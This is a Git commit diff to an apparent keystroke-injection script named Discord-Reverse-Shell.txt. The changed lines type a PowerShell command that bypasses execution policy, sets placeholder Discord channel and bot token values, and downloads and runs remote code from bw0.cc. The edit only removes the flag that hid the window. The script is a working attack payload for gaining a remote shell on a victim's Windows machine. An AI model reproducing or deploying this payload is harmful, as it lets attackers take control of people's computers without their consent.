Update Discord-Reverse-Shell.txt

This commit is contained in:
egieb
2025-06-20 10:53:37 +00:00
committed by GitHub
parent e0d0c82313
commit c5053eeadf

View File

@@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
STRING powershell -Ep Bypass -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
ENTER